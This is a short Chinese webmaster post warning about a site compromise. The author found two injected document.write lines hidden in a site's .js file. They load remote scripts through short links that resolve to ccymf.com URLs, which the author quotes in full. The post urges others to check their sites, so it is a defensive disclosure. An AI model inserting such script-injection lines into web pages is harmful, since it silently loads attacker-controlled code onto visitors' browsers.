某网站正在做百度推广,由于现在百度查的严格,检查页面指向含有ccymf.com 链接地址,打开该网址发现是登录页面
但在网站整站的代码里搜索也没有找到,最后在 .js文件中找到两处
document.write("<script type=\"text/javascript\" src=\"http://t.cn/R4lyzeo\"></script>");
document.write("<script type=\"text/javascript\" src=\"http://t.cn/R4lqMAu\"></script>");
是插入在 .js文件中的,里面使用的短网址,这样很难找到它,打开后是下面两个网址。http://ccymf.com/tongji/118135.js
http://ccymf.com/mobi/m82641.php?uid=ODI2NDFfMTE4MTM1新浪提供短网址http://dwz.wailian.work/ 在这上面即可生成
最新请大家注意你们的网站有没有这种形式的挂马
检查使用火狐的Firebug
END